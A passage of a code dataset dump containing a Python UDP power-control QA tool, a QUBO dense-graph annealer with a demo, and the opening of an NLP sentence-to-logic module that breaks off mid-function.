continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 0:\n cmd = struct.unpack(\"B\", p.data[0])[0]\n if cmd == UDP_STATUS[\"ACK\"]:\n return True\n elif cmd == UDP_STATUS[\"NACK\"]:\n return False\n finally:\n sock.close()\n\n return False\n\n @check_host\n def reset(self, to_id, length=200, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_reset_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def power(self, to_id, length=200, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_power_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def off(self, to_id, length=10000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_off_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def status(self, to_id):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n p = PControlPacket(to_id, PControlPacket.get_status_cmd_data())\n self._send_pcontrol_packet(p, sock)\n\n led_val = -1\n vcc_val = -1\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.STATUS_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 1:\n cmd, val = struct.unpack(\"BB\", p.data[:2])\n if cmd == UDP_STATUS[\"LED\"]:\n led_val = val\n if cmd == UDP_STATUS[\"VCC\"]:\n vcc_val = val\n if led_val >= 0 and vcc_val >= 0:\n log.info(\"Power Control {}: LED = {}, VCC = {}\".format(to_id, led_val, vcc_val))\n return led_val, vcc_val\n finally:\n sock.close()\n\n raise Exception(\"Failed to get status of Power Control {} (it probably doesn't exist)\".format(to_id))\n\n @check_host\n def cold(self, to_id, length=1000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_cold_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def ch(self, to_id, channel=0, length=10000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_ch_cmd_data(channel, length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def gpio(self, to_id, gpio=0, on_off=0, check=True):\n p = PControlPacket(to_id, PControlPacket.get_gpio_cmd_data(gpio, on_off))\n\n if not check:\n self._send_pcontrol_packet(p)\n return\n\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n self._send_pcontrol_packet(p, sock)\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.STATUS_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 2:\n cmd, p_gpio, p_on_off = struct.unpack(\"BBB\", p.data[:3])\n if cmd == UDP_STATUS[\"GPIO\"] and p_gpio == gpio:\n log.info(\"Power Control {}: GPIO {} = {}\".format(to_id, gpio, p_on_off))\n return bool(p_on_off)\n finally:\n sock.close()\n\n raise Exception(\"Failed to set GPIO {} = {} on Power Control {} \"\n \"(Power Control doesn't exist or firmware is old)\".format(gpio, on_off, to_id))\n\n def listen(self, timeout=10):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < timeout:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n p.dump()\n finally:\n sock.close()\n\n\nclass PcontrolArgumentParser(argparse.ArgumentParser):\n def error(self, message):\n log.info(\"\\n{}\\n\".format(SCRIPT_STATUS_FAILED))\n self.exit(2, \"{}: error: {}\\n\".format(self.prog, message))\n\n\nif __name__ == \"__main__\":\n parser = PcontrolArgumentParser()\n parser.add_argument(\"-n\", \"--name\", help=\"Host to perform action\",\n type=str, required=True)\n parser.add_argument(\"-c\", \"--command\", help=\"Command to be performed\",\n choices=[\"reset\", \"power\", \"off\", \"cold\", \"status\", \"ping\", \"offch\", \"gpio\"],\n type=str, required=True)\n parser.add_argument(\"-l\", \"--length\", help=\"Length of the command\",\n type=int, default=200)\n parser.add_argument(\"-d\", \"--delay\", help=\"Delay before command\",\n type=int, default=0)\n parser.add_argument(\"--ch, --channel\", dest=\"channel\", help=\"Channel to turn off (for 12V module)\",\n type=int)\n args = parser.parse_args()\n\n try:\n p = PControl()\n\n if args.command == \"ping\":\n ping_status = p.ping(args.name)\n log.info(\"PING = {}\".format(ping_status))\n elif args.command == \"reset\":\n p.reset(args.name, args.length, args.delay)\n elif args.command == \"power\":\n p.power(args.name, args.length, args.delay)\n elif args.command == \"off\":\n p.off(args.name, args.length, args.delay)\n elif args.command == \"status\":\n led_status = p.status(args.name)[0]\n log.info(\"LED = {}\".format(led_status))\n elif args.command == \"cold\":\n p.cold(args.name, args.length, args.delay)\n elif args.command == \"offch\":\n if args.channel is None:\n raise Exception(\"To perform 'offch' command, channel must be specified\")\n p.ch(args.name, args.channel, args.length, args.delay)\n elif args.command == \"gpio\":\n gpio_status = p.gpio(args.name, args.length, args.delay)\n log.info(\"GPIO = {}\".format(gpio_status))\n except Exception as e:\n log.exception(e.message)\n log.exception(SCRIPT_STATUS_FAILED)\n exit(1)\n\n log.info(SCRIPT_STATUS_SUCCESS)\n","repo_name":"dgubanovv/qa-tests","sub_path":"tools/pcontrol.py","file_name":"pcontrol.py","file_ext":"py","file_size_in_byte":12698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5543770565","text":"from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport thesis_qubo\nfrom . import formulas\nfrom thesis_qubo.common import checkers, symmetrize\nfrom types import MethodType\nfrom thesis_qubo import algorithm as algo\n\nclass DenseGraphAnnealer :\n def __init__(self, W, optimize, prefdict) :\n if not W is None :\n self.set_qubo(W, optimize)\n self._select_algorithm(algo.coloring)\n self.set_preferences(prefdict)\n\n def seed(self, seed) :\n pass\n \n def _vars(self) :\n return self._h, self._J, self._c, self._q\n \n def get_problem_size(self) :\n return self._N;\n\n def set_qubo(self, W, optimize = thesis_qubo.minimize) :\n\n checkers.dense_graph.qubo(W)\n # W = symmetrize(W)\n\n h, J, c = formulas.dense_graph_calculate_hamiltonian(W)\n self._optimize = optimize\n self._h, self._J, self._c = optimize.sign(h), optimize.sign(J), optimize.sign(c)\n self._N = W.shape[0]\n self._m = self._N // 4\n \n def set_hamiltonian(self, h, J, c) :\n\n checkers.dense_graph.hJc(h, J, c)\n J = symmetrize(J)\n self._optimize = thesis_qubo.minimize\n self._h, self._J, self._c = h, J, c\n self._N = J.shape[0]\n self._m = self._N // 2\n \n def _select_algorithm(self, algoname) :\n if algoname == algo.coloring :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_coloring, self)\n elif algoname == algo.sa_naive :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_sa_naive, self)\n elif algoname == algo.sa_default :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_sa_naive, self)\n else :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_naive, self)\n\n def _get_algorithm(self) :\n if self.anneal_one_step.__func__ == DenseGraphAnnealer.anneal_one_step_coloring :\n return algo.coloring;\n if self.anneal_one_step.__func__ == DenseGraphAnnealer.anneal_one_step_sa_naive :\n return algo.sa_naive;\n return algo.naive\n \n def set_preferences(self, prefdict = None, **prefs) :\n if not prefdict is None :\n self._set_prefdict(prefdict)\n self._set_prefdict(prefs)\n \n def _set_prefdict(self, prefdict) :\n v = prefdict.get('n_trotters')\n if v is not None :\n self._m = v;\n v = prefdict.get('algorithm')\n if v is not None :\n self._select_algorithm(v)\n\n def get_preferences(self) :\n prefs = { }\n if hasattr(self, '_m') :\n prefs['n_trotters'] = self._m\n prefs['algorithm'] = self._get_algorithm()\n return prefs\n \n def get_optimize_dir(self) :\n return self._optimize\n\n def get_E(self) :\n h, J, c, q = self._vars()\n E = formulas.dense_graph_batch_calculate_E_from_spin(h, J, c, q)\n return self._optimize.sign(E)\n\n def get_x(self) :\n x = []\n for idx in range(self._m) :\n xtmp = thesis_qubo.bit_from_spin(self._q[idx])\n x.append(xtmp)\n return x\n\n def set_q(self, q) :\n\n if q.dtype != np.int8 :\n q = np.asarray(q, np.int8)\n self._q[:] = q\n\n def set_qset(self, q) :\n\n self._m = len(q)\n self.prepare()\n qlist = q\n for idx in range(len(qlist)) :\n q = qlist[idx]\n if q.dtype != np.int8 :\n q = np.asarray(q, np.int8)\n self._q[idx] = q\n \n # Ising model\n\n def get_hamiltonian(self) :\n return np.copy(self._h), np.copy(self._J), self._c\n\n def get_q(self) :\n return np.copy(self._q)\n \n def randomize_spin(self) :\n thesis_qubo.randomize_spin(self._q)\n\n def calculate_E(self) :\n pass\n \n def prepare(self) :\n if self._m == 1 :\n self._select_algorithm(algo.sa_naive)\n self._q = np.empty((self._m, self._N), dtype=np.int8)\n\n def make_solution(self) :\n pass\n\n def get_system_E(self, G, beta) :\n # average energy\n E = np.mean(self.get_E())\n \n m = self._m\n algo = self._get_algorithm()\n if thesis_qubo.algorithm.is_sqa(algo) :\n q = self._q\n spinDotSum = 0.\n for im in range(m) :\n q0 = np.asarray(q[im], np.float64)\n q1 = np.asarray(q[(im + 1) % m], np.float64)\n spinDotSum += q0.dot(q1)\n E -= 0.5 / beta * np.log(np.tanh(G * beta / m)) * spinDotSum\n \n return E\n \n def anneal_one_step(self, G, beta) :\n # will be dynamically replaced.\n pass\n \n def anneal_one_step_naive(self, G, beta) :\n\n h, J, c, q = self._vars()\n N = self._N\n m = self._m\n two_div_m = 2. / np.float64(m)\n coef = np.log(np.tanh(G * beta / m)) / beta\n \n for i in range(self._N * self._m):\n x = np.random.randint(N)\n y = np.random.randint(m)\n qyx = q[y][x]\n sum = np.dot(J[x], q[y]); # diagnoal elements in J are zero.\n dE = two_div_m * qyx * (h[x] + 2. * sum)\n dE -= qyx * (q[(m + y - 1) % m][x] + q[(y + 1) % m][x]) * coef\n threshold = 1. if (dE <= 0.) else np.exp(-dE * beta)\n if threshold > np.random.rand():\n q[y][x] = - qyx\n\n def anneal_colored_plane(self, G, beta, offset) :\n h, J, c, q = self._vars()\n N = self._N\n m = self._m\n two_div_m = 2. / np.float64(m)\n coef = np.log(np.tanh(G * beta / m)) / beta\n \n for y in range(self._m):\n x = (offset + np.random.randint(1 << 30) * 2) % N\n qyx = q[y][x]\n sum = np.dot(J[x], q[y]); # diagnoal elements in J are zero.\n dE = two_div_m * qyx * (h[x] + 2 * sum)\n dE -= qyx * (q[(m + y - 1) % m][x] + q[(y + 1) % m][x]) * coef\n threshold = 1. if (dE <= 0.) else np.exp(-dE * beta)\n if threshold > np.random.rand():\n q[y][x] = - qyx\n \n def anneal_one_step_coloring(self, G, beta) :\n for loop in range(0, self._N) :\n self.anneal_colored_plane(G, beta, 0)\n self.anneal_colored_plane(G, beta, 1)\n \n def anneal_one_step_sa_naive(self, kT, _) :\n h, J, c, q = self._vars()\n N = self._N\n invKT = 1. / kT\n\n for iq in range(self._m) :\n qm = q[iq]\n for i in range(self._N):\n x = np.random.randint(N)\n qx = qm[x]\n sum = np.dot(J[x], qm); # diagnoal elements in J are zero.\n dE = 2. * qx * (h[x] + 2. * sum)\n threshold = 1. if (dE <= 0.) else np.exp(- dE * invKT)\n if threshold > np.random.rand():\n qm[x] = - qx\n\n \ndef dense_graph_annealer(W = None, optimize = thesis_qubo.minimize, **prefs) :\n an = DenseGraphAnnealer(W, optimize, prefs)\n return an\n\n\nif __name__ == '__main__' :\n\n np.random.seed(0)\n Ginit = 5.\n Gfin = 0.01\n \n nRepeat = 4\n beta = 1. / 0.02\n tau = 0.99\n \n N = 8\n m = 4\n W = np.array([[-32,4,4,4,4,4,4,4],\n [4,-32,4,4,4,4,4,4],\n [4,4,-32,4,4,4,4,4],\n [4,4,4,-32,4,4,4,4],\n [4,4,4,4,-32,4,4,4],\n [4,4,4,4,4,-32,4,4],\n [4,4,4,4,4,4,-32,4],\n [4,4,4,4,4,4,4,-32]])\n \n\n #N = 20\n #m = 10\n\n algoname = algo.default\n # algo = DenseGraphAnnealer.naive\n ann = dense_graph_annealer(W, thesis_qubo.minimize, n_trotters=m)\n ann.set_preferences(algorithm = algo.naive)\n \n for loop in range(0, nRepeat) :\n G = Ginit\n ann.prepare()\n ann.randomize_spin()\n while Gfin < G :\n ann.anneal_one_step(G, beta)\n G = G * tau\n\n ann.make_solution()\n E = ann.get_E()\n #x = ann.get_x()\n print(E) # ,x\n\n prefs = ann.get_preferences()\n print(prefs)\n \n ann = dense_graph_annealer(W, thesis_qubo.maximize)\n ann.set_preferences(prefs)\n for loop in range(0, nRepeat) :\n G = Ginit\n ann.prepare()\n ann.randomize_spin()\n while Gfin < G :\n ann.anneal_one_step(G, beta)\n G = G * tau\n\n ann.make_solution()\n E = ann.get_E()\n #x = ann.get_x()\n print(E) # ,x\n\n prefs = ann.get_preferences()\n print(prefs)\n","repo_name":"masterpradipg/thesis-work","sub_path":"qubo/ewb_matching/py/dense_graph_annealer.py","file_name":"dense_graph_annealer.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30747367790","text":"from multiprocessing import context\nimport sys\n\nfrom requests import get\n\n# ==== import other source files ====\n\n# configuration and other globals are in nlpglobals.py\nfrom nlpglobals import *\n\n# small utilities are in nlputils.py\nfrom nlputils import *\n\n# uncertainty analysis and encoding is in nlpuncertain\nfrom nlpuncertain import *\n\n# pronoun guessing\nfrom nlppronoun import *\n\nfrom nlpobjlogic import *\n\nimport nlptologic\n#from nlptologic import build_property_logic\n\n# ======= globals used and changed during work ===\n\n#constant_nr=0 # new constants created add a numeric suffic, incremented\ndefinition_nr=0 # new definitions created add a numeric suffic, incremented\n\nnoframes=False # set True for debugging: no new frames generated, no frame vars\nnoframevars=False # if true, instead of framevar we use number 1\nnonewframes=True # if true, no new frames generated\n\n# ===== tips for development =====\n\n\n# =============== proper logic building ================================\n\n\ndef build_sentence_proper_logic(ctxt,sentence,tree,iscondition=False,isconsequence=False,confidence=1):\n #debug_print(\"build_sentence_proper_logic tree\",tree)\n if not tree: return tree\n if type(tree)==str: return tree\n if type(tree)==dict: return tree\n if type(tree[0])==dict: return tree\n if tree[0] in [\"svo\",\"sv\"]:\n treeroot=tree[1][0]\n parent=get_parent(sentence,treeroot)\n if parent:\n confidence=get_subsentence_confidence(ctxt,sentence,parent)\n #debug_print(\"build_sentence_proper_logic confidence\",confidence) \n if confidence==0:\n return None \n \n sentlogic=build_single_subsentence_proper_logic(ctxt,sentence,tree,iscondition,isconsequence,confidence,None) \n sentlogic=merge_framevars(sentlogic) \n #debug_print(\"build_sentence_proper_logic sentlogic\",sentlogic) \n #debug_print(\"build_sentence_proper_logic ctxt\",ctxt) \n return sentlogic\n \n elif tree[0] in [\"ref\"]:\n ref=tree[1][1:]\n #debug_print(\"ref\",ref)\n sys.exit(0) \n elif tree[0] in [\"if\"]:\n res=[tree[0]]\n tmp1=build_sentence_proper_logic(ctxt,sentence,tree[1],True,False)\n tmp2=build_sentence_proper_logic(ctxt,sentence,tree[2],False,True)\n \n #debug_print(\"tmp1\",tmp1) \n #debug_print(\"tmp2\",tmp2) \n\n tmp1=remove_logic_annotations(tmp1)\n tmp1=prop_flatten_logic_term(tmp1)\n tmp2=remove_logic_annotations(tmp2) \n tmp2=prop_flatten_logic_term(tmp2)\n\n tmp1vars=collect_free_vars(tmp1)\n tmp2vars=collect_free_vars(tmp2)\n if tmp2vars and not tmp1vars and tmp1 and tmp1[0] in [\"exists\",\"forall\"]:\n # \"if some red elephant is big, it is nice\"\n # not tmp1vars in order to not fire for \"if person has a nice car, he is happy\"\n tmp1=tmp1[2]\n elif not(tmp2vars) and tmp1vars:\n # \"if rabbits are big, elephants are strong\"\n # \"if person has a nice car, he is happy\"\n tmp1=[\"forall\",tmp1vars,tmp1]\n\n #debug_print(\"tmp1 +\",tmp1) \n #debug_print(\"tmp2 +\",tmp2)\n\n res=[tmp1,\"=>\",tmp2]\n #debug_print(\"res\",res) \n vars=collect_free_vars(res)\n #debug_print(\"vars\",vars) \n if vars:\n res=[\"forall\",vars,res] \n res=[\"logic\",tree,res] \n return res \n elif tree[0] in [\"and\",\"or\",\"if\",\"unless\",\"nor\",\"xor\", \"seq\"]:\n res=[tree[0]]\n for el in tree[1:]:\n tmp=build_sentence_proper_logic(ctxt,sentence,el,iscondition,isconsequence)\n res.append(tmp)\n res=prop_flatten_logic_term(res) \n return res\n else:\n #res=prop_flatten_logic_term(res) \n return tree \n\n\ndef get_subsentence_confidence(ctxt,sentence,parent):\n #debug_print(\"get_subsentence_confidence parent\",parent)\n if not parent: return 1\n polarity=1\n if parent[\"upos\"] in [\"ADJ\"] and parent[\"lemma\"] in [\"false\"]:\n polarity=-1 \n confidence=get_word_confidence(ctxt,sentence,parent) \n confidence=polarity*confidence \n polarity2=get_word_polarity(ctxt,sentence,parent)\n if not polarity2: confidence=-1*confidence\n elif parent[\"upos\"] in [\"ADJ\"] and parent[\"lemma\"] in [\"true\"]:\n polarity=1 \n confidence=get_word_confidence(ctxt,sentence,parent) \n confidence=polarity*confidence\n polarity2=get_word_polarity(ctxt,sentence,parent)\n if not polarity2: confidence=-1*confidence \n else:\n #confidence=1\n confidence=get_lemma_confidence(sentence,parent[\"lemma\"]) \n if confidence!=1:\n polarity=get_word_polarity(ctxt,sentence,parent)\n if not polarity: confidence=-1*confidence \n\n #debug_print(\"get_subsentence_confidence polarity\",polarity)\n #debug_print(\"get_subsentence_confidence confidence\",confidence)\n return confidence\n\n\n\ndef build_single_subsentence_proper_logic(ctxt,sentence,tree,\n iscondition=False,isconsequence=False,top_confidence=1,parent_object_pair=None): \n #debug_print(\"build_single_subsentence_proper_logic tree\",tree)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n #debug_print(\"ctxt[isquestion]\",ctxt[\"isquestion\"])\n #debug_print(\"build_single_subsentence_proper_logic parent_object_pair\",parent_object_pair)\n #debug_print(\"ctxt[objects] at the beginning of build_single_subsentence_proper_logic\",ctxt[\"objects\"])\n #debug_print(\"-----------------------------------\")\n #debug_print(\"build_single_subsentence_proper_logic top_confidence\",top_confidence)\n #debug_print(\"build_single_subsentence_proper_logic iscondition\",iscondition)\n\n svo=tree[1][1:]\n #debug_print(\"svo\",svo)\n subjpart=svo[0]\n verbpart=svo[1]\n if len(svo)>2: \n objpart=svo[2]\n else:\n objpart=None \n #debug_print(\"verbpart\",verbpart)\n verb=verbpart\n subj_logic=None\n if (type(verbpart)==dict and type(subjpart)==dict and \n (\"relatedobjects\" in verbpart) and (subjpart[\"upos\"] in [\"PRON\"]) and \n subjpart[\"lemma\"] in [\"which\",\"that\",\"who\",\"what\"]):\n #John liked the forest which was bought by Mary.\n prev=get_previous_word(sentence,subjpart)\n if prev:\n for el in verbpart[\"relatedobjects\"]:\n if (el[\"case\"][\"lemma\"]==\"by\" and (\"obj\" in el)):\n # ... which was bought by Mary \n #debug_print(\"reversed!\") \n objpart=prev\n subjpart=el[\"proplogic\"]\n break\n\n object_data=None\n object=None\n object_quant=None\n svar=None\n subject_quantifier=None\n sentence_type=None\n relatedobject=None\n relation_word=None\n\n #debug_print(\"objpart\",objpart)\n\n if (type(verb)==dict and verb[\"lemma\"] in [\"be\"] and not \"relation\" in verb and\n \"relatedobjects\" in verb): \n related=verb[\"relatedobjects\"] \n for el in related:\n if \"case\" in el and \"proplogic\" in el and el[\"case\"][\"lemma\"] in [\"of\"]:\n # Elephants are afraid of mice\n sentence_type=\"is_of\"\n relation_word=objpart\n relatedobject=el\n objpart=relatedobject[\"obj\"] \n break\n \n if objpart:\n #debug_print(\"build_single_subsentence_proper_logic objpart\",objpart)\n object_data=make_object_data(ctxt,sentence,objpart)\n #debug_print(\"object_data\",object_data)\n object=get_thing(objpart)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n object_quant=get_word_quant(ctxt,sentence,object)\n\n #debug_print(\"object_quant\",object_quant) \n subject=get_thing(subjpart)\n subjspecialvar=None\n subjconst=None\n subjispronoun=False\n subjisparent=False\n subject_det=get_word_det(ctxt,sentence,subject)\n sargument=None\n\n if pronoun(ctxt,subject):\n #debug_print(\"subject is pronoun:\",subject)\n if not subject[\"lemma\"] in [\"who\",\"that\",\"whom\",\"which\"]:\n tmp=resolve_pronoun(ctxt,sentence,subject,tree,verb,object)\n else:\n tmp=None \n #debug_print(\"subject resolved to tmp:\",tmp)\n if not tmp:\n if parent_object_pair:\n subjrepr=parent_object_pair[0]\n #subjispronoun=True # ??\n subjisparent=True\n else: \n # She was in a room. She was in a room?\n # If she was cool, then she was nice.\n subjconst=find_make_constant(ctxt,sentence,subject) \n subjrepr=subjconst\n subjispronoun=True\n else: \n subject=tmp[1]\n subjrepr=tmp[0]\n subjispronoun=True\n elif subject and subject[\"lemma\"]==unknownsubject:\n svar=\"?:\"+subject[\"lemma\"]\n subjspecialvar=svar \n subjrepr=subjspecialvar\n subject_quantifier=\"exists\" \n elif subject and variable_shaped_lemma(subject[\"lemma\"]):\n svar=\"?:\"+subject[\"text\"]\n subjspecialvar=svar \n subjrepr=subjspecialvar \n elif (subject and subject[\"upos\"] in [\"PROPN\"] and \n (\"ner\" not in subject or subject[\"ner\"] not in [\"NORP\",\"S-NORP\"])):\n #debug_print(\"subj is propn\",subject)\n subjconst=find_make_constant(ctxt,sentence,subject) \n subjrepr=subjconst\n elif is_concrete_thing(ctxt,sentence,subject,subject_det,verb,iscondition,isconsequence,isobject=False):\n if False:\n None\n else: \n #ctxt[\"nosaveconstant\"]=True\n if parent_object_pair:\n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,parent_object_pair[0],verbpart,subjpart,True) \n else:\n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,dummysubject,verbpart,subjpart,True) \n if tmp_logic and type(tmp_logic)==list and tmp_logic[0]==\"not\":\n tmp_logic=tmp_logic[1] \n #debug_print(\"tmp_logic1\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic)\n subjconst=make_determined_constant(ctxt,sentence,subject,subject_det,tmp_logic,verb) \n subjrepr=subjconst \n tmp_logic=logic_replace_el(tmp_logic,dummysubject,subjconst)\n #debug_print(\"tmp_logic 3\",tmp_logic) \n if subjconst:\n #debug_print(\"ctxt\",ctxt)\n #debug_print(\"ctxt[objects]\",ctxt[\"objects\"])\n for el in ctxt[\"objects\"]:\n if el[0]==subjconst:\n tmp=logic_replace_el(el[2],\"?:X10\",subjconst)\n el[2]=tmp\n #debug_print(\"tmp_logic 4\",tmp_logic) \n if (\"argument\" in subject) and type(subjrepr)==list and is_theof_or_measure_function(subjrepr[0]): \n if tmp_logic:\n arg_logic=tmp_logic\n subj_logic=tmp_logic\n\n sargument=subject[\"argument\"]\n #debug_print(\"subjrepr\",subjrepr) \n #debug_print(\"sargument\",sargument)\n \n elif \"argument\" in subject: \n svar=None\n sargument=subject[\"argument\"]\n #debug_print(\"sargument 0\",sargument)\n svar=\"?:S\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n\n #subjconst1=make_determined_constant(ctxt,sentence,subject,subject_det,None)\n #debug_print(\"subjconst1\",subjconst1) \n #subject_det=get_word_det(ctxt,sentence,subject)\n #debug_print(\"argument\",sargument)\n #debug_print(\"subject_det\",subject_det) \n # assume a concrete argument and a concrete function\n #if (subject_det and subject_det[\"lemma\"] in [\"the\"]):\n #debug_print(\"concrete argument-having object\")\n #argconst=make_constant(ctxt,argument)\n #sargconst=find_make_constant(ctxt,sentence,sargument,False,True,None)\n #sterm=[theof_function+\"1\",subject[\"lemma\"],sargconst] \n #debug_print(\"created sterm\",sterm) \n #return term \n\n tmp_logic=make_simple_obj_logic(ctxt,sentence,svar,subjpart,verbpart,subjpart,None) \n if tmp_logic and type(tmp_logic)==list and tmp_logic[0]==\"not\":\n tmp_logic=tmp_logic[1] \n #debug_print(\"tmp_logic1\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic) \n subjrepr=svar \n subj_logic=tmp_logic\n #debug_print(\"subj_logic alternative\",subj_logic)\n if subjrepr:\n #debug_print(\"ctxt\",ctxt)\n #debug_print(\"ctxt[objects]\",ctxt[\"objects\"])\n if not ctxt[\"isquestion\"] and not (\"nosaveconstant\" in ctxt and ctxt[\"nosaveconstant\"]): \n for el in ctxt[\"objects\"]:\n if el[0]==subjrepr:\n tmp=logic_replace_el(el[2],\"?:X10\",subjrepr)\n el[2]=tmp \n else:\n #debug_print(\"cpy default case subject\",subject)\n svar=\"?:S\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n subjrepr=svar \n subject_quant=get_word_quant(ctxt,sentence,subject) \n #debug_print(\"subject_quant\",subject_quant) \n #debug_print(\"cp subjrepr\",subjrepr) \n\n # maybe the same subject already exists?\n if (subject and (\"passed_words\" in ctxt) and\n subject[\"upos\"] in [\"NOUN\"]): \n #debug_print(\"cpz subject\",subject) \n #debug_print(\"cpz ctxt[passed_words]\",ctxt[\"passed_words\"])\n for el in ctxt[\"passed_words\"]:\n if el[1]==subject:\n subjrepr=el[0]\n break\n \n if is_var(subjrepr):\n if (subject_quant and subject_quant[\"lemma\"] in [\"every\",\"all\",\"no\"]):\n if not word_has_child_in_deprel_upos(ctxt,sentence,subject,[\"advmod\"],[\"ADV\"]):\n if object and word_has_child_in_deprel_upos(ctxt,sentence,object,[\"advmod\"],[\"ADV\"]):\n None\n else: \n subjrepr=subjrepr+\"_every\"\n \n #debug_print(\" ----------- subj_logic 00 ----------\",subj_logic)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"svar\",svar)\n if subjispronoun or subjisparent:\n subj_logic=True\n elif sargument: # and svar:\n None\n else: \n subj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjrepr,verbpart,subjpart,True)\n if subj_logic and type(subj_logic)==list and subj_logic[0]==\"not\":\n subj_logic=subj_logic[1] \n\n #debug_print(\"subj_logic 0\",subj_logic)\n subj_logic=prop_flatten_logic_term(subj_logic)\n subjvars=collect_free_vars(subj_logic) \n \n if ctxt[\"isquestion\"] and subject_det and subject_det[\"lemma\"] in [\"a\"]:\n # Change of \"a\" into \"some\" for question if the kind of object is present in ctxt\n # \"The red square has a nail. The blue square has a hole. A square has a nail?\"\n oldobject=find_existing_object(ctxt,sentence,subject,subj_logic)\n #debug_print(\"subj_logic\",subj_logic)\n #debug_print(\"oldobject\",oldobject)\n if oldobject:\n subject_quantifier=\"exists\"\n\n #debug_print(\"subj_logic 1\",subj_logic)\n #debug_print(\"subj_logic svar\",svar)\n #debug_print(\"subj_logic subjrepr\",subjrepr)\n #debug_print(\"verb\",verb)\n #debug_print(\"subj_logic subjvars\",subjvars)\n #debug_print(\"subj_logic subjconst\",subjconst)\n \n update_ctxt_objects(ctxt,subjconst,subject,subj_logic)\n #debug_print(\"ctxt x ctxt[objects]\",ctxt[\"objects\"]) \n #debug_print(\"subjrepr\",subjrepr)\n\n # - - - - - verb is be - - - - - -\n\n if type(verb)==dict and verb[\"lemma\"] in [\"be\"] and not \"relation\" in verb and sentence_type!=\"is_of\":\n #debug_print(\"be-sentence\")\n var=subjrepr #\"?:X\"\n objrepr=subjrepr\n if subjspecialvar: var=subjspecialvar \n if (subject_quant and subject_quant[\"lemma\"] in [\"no\",\"zero\"] and\n (not(object_quant) or not(object_quant[\"lemma\"] in [\"no\",\"zero\"]))): reversepolarity=True\n else: reversepolarity=False\n subj_quant_confidence=get_word_quantor_confidence(ctxt,sentence,subject)\n subj_confidence=top_confidence*subj_quant_confidence \n if subj_confidence==0: return None\n elif subj_confidence<0: reversepolarity=not reversepolarity\n if subj_confidence==0:\n return None \n #debug_print(\"checkpoint a subjrepr\",subjrepr) \n #debug_print(\"checkpoint a subj_logic\",subj_logic)\n #debug_print(\"checkpoint a subj_confidence\",subj_confidence)\n \n obj_logic=make_obj_data_logic(ctxt,sentence,var,subjpart,verbpart,objpart,object_data,False,False,reversepolarity,[abs(subj_confidence),True],subjrepr)\n #debug_print(\"checkpoint b obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint b framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n #debug_print(\"checkpoint c obj_logic\",obj_logic)\n #debug_print(\"subject 0\",subject)\n #debug_print(\"subject_det 0\",subject_det)\n #debug_print(\"subject_quant 0\",subject_quant)\n #debug_print(\"subject_quantifier subjrepr\",[subject_quantifier,subjrepr])\n \n if not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exist\"]:\n quantifier=\"exists\"\n logic=[\"logic\",tree,[quantifier,[var],[\"and\",subj_logic,obj_logic]]]\n elif not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\"]:\n quantifier=\"forall\"\n if subject_quant[\"lemma\"] in [\"all\"] and type(obj_logic)==list and obj_logic[0]==\"not\":\n logic=[\"logic\",tree,[\"exists\",[var],[subj_logic,\"&\",obj_logic]]]\n else:\n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n elif (ctxt[\"isquestion\"] and not(subjispronoun) and (not sargument) and\n subject[\"upos\"]==\"NOUN\" and\n not subject_quant and subject_det and \n subject_det[\"lemma\"] in[\"a\"]):\n quantifier=\"exists\" \n \n #logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n 